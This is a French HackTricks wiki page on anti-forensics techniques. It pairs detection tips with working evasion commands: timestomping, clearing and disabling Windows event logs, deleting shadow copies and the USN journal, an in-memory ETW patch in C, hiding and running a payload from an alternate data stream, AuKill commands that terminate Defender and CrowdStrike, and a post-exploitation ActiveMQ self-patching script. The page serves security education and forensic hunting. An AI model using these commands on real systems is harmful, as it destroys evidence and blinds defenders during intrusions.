Techniques Anti-Forensiques

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Horodatages

Un attaquant peut ĂȘtre intĂ©ressĂ© par le changement des horodatages des fichiers pour Ă©viter d’ĂȘtre dĂ©tectĂ©.
Il est possible de trouver les horodatages Ă  l’intĂ©rieur du MFT dans les attributs $STANDARD_INFORMATION __ et __ $FILE_NAME.

Les deux attributs ont 4 horodatages : Modification, accÚs, création, et modification du registre MFT (MACE ou MACB).

L’explorateur Windows et d’autres outils affichent les informations de $STANDARD_INFORMATION.

TimeStomp - Outil Anti-forensique

Cet outil modifie les informations d’horodatage Ă  l’intĂ©rieur de $STANDARD_INFORMATION mais pas les informations Ă  l’intĂ©rieur de $FILE_NAME. Par consĂ©quent, il est possible d’identifier une activitĂ© suspecte.

Usnjrnl

Le Journal USN (Journal de NumĂ©ro de SĂ©quence de Mise Ă  Jour) est une fonctionnalitĂ© du NTFS (systĂšme de fichiers Windows NT) qui suit les changements de volume. L’outil UsnJrnl2Csv permet d’examiner ces changements.

L’image prĂ©cĂ©dente est la sortie affichĂ©e par l’outil oĂč l’on peut observer que certains changements ont Ă©tĂ© effectuĂ©s sur le fichier.

$LogFile

Tous les changements de mĂ©tadonnĂ©es d’un systĂšme de fichiers sont enregistrĂ©s dans un processus connu sous le nom de journalisation anticipĂ©e. Les mĂ©tadonnĂ©es enregistrĂ©es sont conservĂ©es dans un fichier nommĂ© **$LogFile**, situĂ© dans le rĂ©pertoire racine d’un systĂšme de fichiers NTFS. Des outils comme LogFileParser peuvent ĂȘtre utilisĂ©s pour analyser ce fichier et identifier les changements.

Encore une fois, dans la sortie de l’outil, il est possible de voir que certains changements ont Ă©tĂ© effectuĂ©s.

En utilisant le mĂȘme outil, il est possible d’identifier Ă  quel moment les horodatages ont Ă©tĂ© modifiĂ©s :

  • CTIME : Heure de crĂ©ation du fichier
  • ATIME : Heure de modification du fichier
  • MTIME : Modification du registre MFT du fichier
  • RTIME : Heure d’accĂšs du fichier

Comparaison de $STANDARD_INFORMATION et $FILE_NAME

Une autre façon d’identifier des fichiers modifiĂ©s suspects serait de comparer le temps sur les deux attributs Ă  la recherche de disparitĂ©s.

Nanosecondes

Les horodatages NTFS ont une précision de 100 nanosecondes. Ainsi, trouver des fichiers avec des horodatages comme 2010-10-10 10:10:00.000:0000 est trÚs suspect.

SetMace - Outil Anti-forensique

Cet outil peut modifier les deux attributs $STARNDAR_INFORMATION et $FILE_NAME. Cependant, depuis Windows Vista, il est nĂ©cessaire qu’un OS en direct modifie ces informations.

Masquage de Données

NFTS utilise un cluster et la taille minimale d’information. Cela signifie que si un fichier occupe et utilise un cluster et demi, la moitiĂ© restante ne sera jamais utilisĂ©e jusqu’à ce que le fichier soit supprimĂ©. Il est donc possible de cacher des donnĂ©es dans cet espace de remplissage.

Il existe des outils comme slacker qui permettent de cacher des donnĂ©es dans cet espace “cachĂ©â€. Cependant, une analyse du $logfile et du $usnjrnl peut montrer que certaines donnĂ©es ont Ă©tĂ© ajoutĂ©es :

Il est alors possible de rĂ©cupĂ©rer l’espace de remplissage en utilisant des outils comme FTK Imager. Notez que ce type d’outil peut sauvegarder le contenu obfusquĂ© ou mĂȘme chiffrĂ©.

UsbKill

C’est un outil qui Ă©teindra l’ordinateur si un changement dans les ports USB est dĂ©tectĂ©.
Une façon de le dĂ©couvrir serait d’inspecter les processus en cours et de rĂ©viser chaque script python en cours d’exĂ©cution.

Distributions Linux Live

Ces distributions sont exĂ©cutĂ©es dans la mĂ©moire RAM. La seule façon de les dĂ©tecter est si le systĂšme de fichiers NTFS est montĂ© avec des permissions d’écriture. S’il est montĂ© uniquement avec des permissions de lecture, il ne sera pas possible de dĂ©tecter l’intrusion.

Suppression Sécurisée

https://github.com/Claudio-C/awesome-data-sanitization

Configuration de Windows

Il est possible de dĂ©sactiver plusieurs mĂ©thodes de journalisation de Windows pour rendre l’enquĂȘte d’analyse forensique beaucoup plus difficile.

DĂ©sactiver les Horodatages - UserAssist

C’est une clĂ© de registre qui maintient les dates et heures auxquelles chaque exĂ©cutable a Ă©tĂ© exĂ©cutĂ© par l’utilisateur.

Désactiver UserAssist nécessite deux étapes :

  1. Définir deux clés de registre, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs et HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled, toutes deux à zéro pour signaler que nous voulons désactiver UserAssist.
  2. Effacer vos sous-arbres de registre qui ressemblent Ă  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>.

DĂ©sactiver les Horodatages - Prefetch

Cela enregistrera des informations sur les applications exĂ©cutĂ©es dans le but d’amĂ©liorer les performances du systĂšme Windows. Cependant, cela peut Ă©galement ĂȘtre utile pour les pratiques d’analyse forensique.

  • ExĂ©cutez regedit
  • SĂ©lectionnez le chemin de fichier HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters
  • Cliquez avec le bouton droit sur EnablePrefetcher et EnableSuperfetch
  • SĂ©lectionnez Modifier sur chacun d’eux pour changer la valeur de 1 (ou 3) Ă  0
  • RedĂ©marrez

DĂ©sactiver les Horodatages - DerniĂšre Heure d’AccĂšs

Chaque fois qu’un dossier est ouvert Ă  partir d’un volume NTFS sur un serveur Windows NT, le systĂšme prend le temps de mettre Ă  jour un champ d’horodatage sur chaque dossier rĂ©pertoriĂ©, appelĂ© l’heure de dernier accĂšs. Sur un volume NTFS trĂšs utilisĂ©, cela peut affecter les performances.

  1. Ouvrez l’Éditeur de Registre (Regedit.exe).
  2. Parcourez HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem.
  3. Recherchez NtfsDisableLastAccessUpdate. S’il n’existe pas, ajoutez ce DWORD et dĂ©finissez sa valeur Ă  1, ce qui dĂ©sactivera le processus.
  4. Fermez l’Éditeur de Registre et redĂ©marrez le serveur.

Supprimer l’Historique USB

Toutes les EntrĂ©es de PĂ©riphĂ©riques USB sont stockĂ©es dans le Registre Windows sous la clĂ© de registre USBSTOR qui contient des sous-clĂ©s crĂ©Ă©es chaque fois que vous branchez un pĂ©riphĂ©rique USB sur votre PC ou ordinateur portable. Vous pouvez trouver cette clĂ© ici HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR. En supprimant cela, vous supprimerez l’historique USB.
Vous pouvez Ă©galement utiliser l’outil USBDeview pour vous assurer que vous les avez supprimĂ©s (et pour les supprimer).

Un autre fichier qui sauvegarde des informations sur les USB est le fichier setupapi.dev.log Ă  l’intĂ©rieur de C:\Windows\INF. Cela devrait Ă©galement ĂȘtre supprimĂ©.

Désactiver les Copies de Sécurité

Lister les copies de sécurité avec vssadmin list shadowstorage
Les supprimer en exécutant vssadmin delete shadow

Vous pouvez Ă©galement les supprimer via l’interface graphique en suivant les Ă©tapes proposĂ©es dans https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html

Pour dĂ©sactiver les copies de sĂ©curitĂ© Ă©tapes Ă  partir d’ici:

  1. Ouvrez le programme Services en tapant “services” dans la zone de recherche aprĂšs avoir cliquĂ© sur le bouton de dĂ©marrage Windows.
  2. Dans la liste, trouvez “Volume Shadow Copy”, sĂ©lectionnez-le, puis accĂ©dez aux PropriĂ©tĂ©s en cliquant avec le bouton droit.
  3. Choisissez DĂ©sactivĂ© dans le menu dĂ©roulant “Type de dĂ©marrage”, puis confirmez le changement en cliquant sur Appliquer et OK.

Il est Ă©galement possible de modifier la configuration des fichiers qui vont ĂȘtre copiĂ©s dans la copie de sĂ©curitĂ© dans le registre HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot

Écraser les fichiers supprimĂ©s

  • Vous pouvez utiliser un outil Windows : cipher /w:C Cela indiquera Ă  cipher de supprimer toutes les donnĂ©es de l’espace disque inutilisĂ© disponible Ă  l’intĂ©rieur du lecteur C.
  • Vous pouvez Ă©galement utiliser des outils comme Eraser

Supprimer les journaux d’évĂ©nements Windows

  • Windows + R –> eventvwr.msc –> DĂ©veloppez “Journaux Windows” –> Cliquez avec le bouton droit sur chaque catĂ©gorie et sĂ©lectionnez “Effacer le journal”
  • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  • Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

DĂ©sactiver les journaux d’évĂ©nements Windows

  • reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f
  • Dans la section des services, dĂ©sactivez le service “Journal des Ă©vĂ©nements Windows”
  • WEvtUtil.exec clear-log ou WEvtUtil.exe cl

DĂ©sactiver $UsnJrnl

  • fsutil usn deletejournal /d c:

Journalisation Avancée & Manipulation de Trace (2023-2025)

Journalisation des ScriptBlocks/Modules PowerShell

Les versions récentes de Windows 10/11 et Windows Server conservent des artéfacts forensiques PowerShell riches sous Microsoft-Windows-PowerShell/Operational (événements 4104/4105/4106). Les attaquants peuvent les désactiver ou les effacer à la volée :

# Turn OFF ScriptBlock & Module logging (registry persistence)
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force

# In-memory wipe of recent PowerShell logs
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
Remove-WinEvent               # requires admin & Win11 23H2+

Les défenseurs devraient surveiller les modifications apportées à ces clés de registre et la suppression en grande quantité des événements PowerShell.

Patch ETW (Event Tracing for Windows)

Les produits de sĂ©curitĂ© des points de terminaison s’appuient fortement sur ETW. Une mĂ©thode d’évasion populaire en 2024 consiste Ă  patcher ntdll!EtwEventWrite/EtwEventWriteFull en mĂ©moire afin que chaque appel ETW renvoie STATUS_SUCCESS sans Ă©mettre l’évĂ©nement :

// 0xC3 = RET on x64
unsigned char patch[1] = { 0xC3 };
WriteProcessMemory(GetCurrentProcess(),
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
patch, sizeof(patch), NULL);

Public PoCs (e.g. EtwTiSwallow) implĂ©mentent la mĂȘme primitive en PowerShell ou C++.
Parce que le patch est local au processus, les EDRs fonctionnant dans d’autres processus peuvent le manquer.
Détection : comparer ntdll en mémoire vs. sur disque, ou intercepter avant le mode utilisateur.

Renaissance des Flux de Données Alternatifs (ADS)

Des campagnes de malware en 2023 (e.g. FIN12 loaders) ont Ă©tĂ© observĂ©es mettant en scĂšne des binaires de deuxiĂšme Ă©tape Ă  l’intĂ©rieur des ADS pour rester hors de vue des scanners traditionnels :

rem Hide cobalt.bin inside an ADS of a PDF
type cobalt.bin > report.pdf:win32res.dll
rem Execute directly
wmic process call create "cmd /c report.pdf:win32res.dll"

ÉnumĂ©rez les flux avec dir /R, Get-Item -Stream *, ou Sysinternals streams64.exe. Copier le fichier hĂŽte vers FAT/exFAT ou via SMB supprimera le flux cachĂ© et peut ĂȘtre utilisĂ© par les enquĂȘteurs pour rĂ©cupĂ©rer la charge utile.

BYOVD & “AuKill” (2023)

Bring-Your-Own-Vulnerable-Driver est dĂ©sormais couramment utilisĂ© pour anti-forensics dans les intrusions par ransomware. L’outil open-source AuKill charge un pilote signĂ© mais vulnĂ©rable (procexp152.sys) pour suspendre ou terminer les capteurs EDR et forensiques avant le chiffrement et la destruction des journaux :

AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
AuKill.exe -k CrowdStrike

Le pilote est ensuite supprimé, laissant des artefacts minimes.
AttĂ©nuations : activer la liste de blocage des pilotes vulnĂ©rables de Microsoft (HVCI/SAC) et alerter sur la crĂ©ation de services du noyau Ă  partir de chemins modifiables par l’utilisateur.

Anti-Forensique Linux : Auto-correction et Cloud C2 (2023–2025)

Auto-correction des services compromis pour réduire la détection (Linux)

Les adversaires “s’auto-corrigent” de plus en plus un service juste aprĂšs l’avoir exploitĂ© pour Ă  la fois prĂ©venir la rĂ©-exploitation et supprimer les dĂ©tections basĂ©es sur des vulnĂ©rabilitĂ©s. L’idĂ©e est de remplacer les composants vulnĂ©rables par les derniers binaires/JARs lĂ©gitimes en amont, de sorte que les scanners rapportent l’hĂŽte comme corrigĂ© tout en maintenant la persistance et le C2.

Exemple : Apache ActiveMQ OpenWire RCE (CVE‑2023‑46604)

  • AprĂšs l’exploitation, les attaquants ont rĂ©cupĂ©rĂ© des JARs lĂ©gitimes depuis Maven Central (repo1.maven.org), ont supprimĂ© les JARs vulnĂ©rables dans l’installation d’ActiveMQ et ont redĂ©marrĂ© le courtier.
  • Cela a fermĂ© le RCE initial tout en maintenant d’autres points d’ancrage (cron, modifications de configuration SSH, implants C2 sĂ©parĂ©s).

Exemple opérationnel (illustratif)

# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib

# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar

# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar

# Apply changes without removing persistence
systemctl restart activemq || service activemq restart

Forensic/hunting tips

  • Examine les rĂ©pertoires de services pour des remplacements de binaire/JAR non planifiĂ©s :
  • Debian/Ubuntu : dpkg -V activemq et comparez les hachages/chemins de fichiers avec les miroirs de dĂ©pĂŽt.
  • RHEL/CentOS : rpm -Va 'activemq*'
  • Recherchez les versions JAR prĂ©sentes sur le disque qui ne sont pas dĂ©tenues par le gestionnaire de paquets, ou des liens symboliques mis Ă  jour hors bande.
  • Chronologie : find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort pour corrĂ©ler ctime/mtime avec la fenĂȘtre de compromission.
  • Historique de shell/tĂ©lĂ©metrie de processus : preuves de curl/wget vers repo1.maven.org ou d’autres CDN d’artefacts immĂ©diatement aprĂšs l’exploitation initiale.
  • Gestion des changements : validez qui a appliquĂ© le “patch” et pourquoi, pas seulement qu’une version corrigĂ©e est prĂ©sente.

Cloud‑service C2 avec des jetons porteurs et des stagers anti-analyse

Le savoir-faire observé combinait plusieurs chemins C2 à long terme et un emballage anti-analyse :

  • Chargeurs ELF PyInstaller protĂ©gĂ©s par mot de passe pour entraver le sandboxing et l’analyse statique (par exemple, PYZ chiffrĂ©, extraction temporaire sous /_MEI*).
  • Indicateurs : hits strings tels que PyInstaller, pyi-archive, PYZ-00.pyz, MEIPASS.
  • Artefacts d’exĂ©cution : extraction vers /tmp/_MEI* ou chemins personnalisĂ©s --runtime-tmpdir.
  • C2 soutenu par Dropbox utilisant des jetons OAuth Bearer codĂ©s en dur
  • Marqueurs rĂ©seau : api.dropboxapi.com / content.dropboxapi.com avec Authorization: Bearer <token>.
  • Chasser dans les proxy/NetFlow/Zeek/Suricata pour des HTTPS sortants vers des domaines Dropbox Ă  partir de charges de travail serveur qui ne synchronisent normalement pas de fichiers.
  • C2 parallĂšle/de secours via tunneling (par exemple, Cloudflare Tunnel cloudflared), gardant le contrĂŽle si un canal est bloquĂ©.
  • IOCs d’hĂŽte : processus/unitĂ© cloudflared, configuration Ă  ~/.cloudflared/*.json, sortant 443 vers les bords de Cloudflare.

Persistance et “rollback de durcissement” pour maintenir l’accùs (exemples Linux)

Les attaquants associent frĂ©quemment auto-correction avec des chemins d’accĂšs durables :

  • Cron/Anacron : modifications du stub 0anacron dans chaque rĂ©pertoire /etc/cron.*/ pour une exĂ©cution pĂ©riodique.
  • Chasser :
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
  • RĂ©trogradation de durcissement de la configuration SSH : activation des connexions root et modification des shells par dĂ©faut pour les comptes Ă  faible privilĂšge.
  • Chasser l’activation de la connexion root :
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# valeurs de drapeau comme "yes" ou paramĂštres trop permissifs
  • Chasser les shells interactifs suspects sur les comptes systĂšme (par exemple, games) :
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
  • Artefacts de balise alĂ©atoires et de noms courts (8 caractĂšres alphabĂ©tiques) dĂ©posĂ©s sur le disque qui contactent Ă©galement le C2 cloud :
  • Chasser :
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort

Les dĂ©fenseurs devraient corrĂ©ler ces artefacts avec l’exposition externe et les Ă©vĂ©nements de patch de service pour dĂ©couvrir l’auto-rĂ©mĂ©diation anti-forensique utilisĂ©e pour cacher l’exploitation initiale.

References

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks